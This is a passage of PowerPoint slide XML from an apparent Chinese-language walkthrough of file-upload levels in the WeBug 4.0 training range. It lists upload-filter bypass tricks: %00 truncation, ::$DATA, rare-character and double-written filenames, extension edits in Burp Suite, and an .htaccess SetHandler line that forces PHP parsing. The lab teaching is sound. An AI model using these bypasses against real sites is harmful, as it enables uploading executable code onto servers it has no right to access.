            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行拦截改包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们制作一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>页面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37692653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34EADB-DE92-4E47-A708-78A3BC50C0C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030287" y="338666"/>
            <a:ext cx="10131425" cy="492607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-18_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5915A987-DC2F-422D-B150-97AC575165FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290945" y="1039091"/>
            <a:ext cx="11430000" cy="5480243"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在这一关中，既然是文件上传的解析漏洞，那么我们就想着使用畸形解析漏洞等：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大小写   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后缀名   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>php3  php5 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>::$DATA  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这些都是不可成功的！！！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解决方法： 查询生僻字                 龘（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>crow.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>龘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接上传即可！！！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41219745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8C5E82-901E-429F-ACA3-E04F3002D6C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="400729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-19_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>畸形文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{299D6627-DC21-4FCB-829A-15E8F91CA887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="11630890" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>只能传图片</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>crow.php.jpg   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>然后在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中修改掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.jpg   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看返回信息 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C:/phpStudy/WWW/template/upload/1569851084  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时文件被处理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们尝试双写  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>crow.pphphp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回正常的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1156150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BEFDC5-1A6A-47A4-926C-2ACC821CD5CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="497711"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Webug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD497D7-F25B-4060-AB8D-5134228DCB3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="811894" y="1634837"/>
            <a:ext cx="10729976" cy="4682836"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>WeBug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>名称定义为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们的漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>靶场环境 ，基础环境是基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>制作搭建而成，中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>webug3.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发布后的四百多天</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>226</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全团队终于在大年初二发布了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>webug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>226</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>安全团队送来的新年礼物</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>——webug4.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>，大年初二发布</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>(2019</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目前有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网址： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.webug.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GitHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/wangai3176/webug4.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有百度云分享链接，其中一个已经失效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我分享的百度云：链接：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://pan.baidu.com/s/1h5KYip0jMLgQpNbrKqF7BQ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jcka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分享时间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2019.09.26)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230520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E86251-1445-4998-9FF0-26F1E4AEE8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="511566"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-20_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>截断上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B259F2D-6679-43CC-BB93-1119F142BD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="11395363" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方法与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less-18</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关相同，注意：我在使用汉字的时候上传可能不一样，或者无法进行解析为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，所以我们选择生僻字               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C:/phpStudy/WWW/template/upload/crow.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="804739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E86251-1445-4998-9FF0-26F1E4AEE8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="511566"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-21_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)_01</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B259F2D-6679-43CC-BB93-1119F142BD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122219"/>
            <a:ext cx="12081165" cy="5597236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器中的一个配置文件，它负责相关目录下的网页配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件，可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>301</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重定向、自定义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>页面、修改文件拓展名等功能。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参考文件：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://blog.csdn.net/cmzhuang/article/details/53537591</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SetHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> application/x-httpd-php  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这行代码的意思是将所有文件解析为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件</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4726083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E86251-1445-4998-9FF0-26F1E4AEE8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="511566"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-21_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)_02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B259F2D-6679-43CC-BB93-1119F142BD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
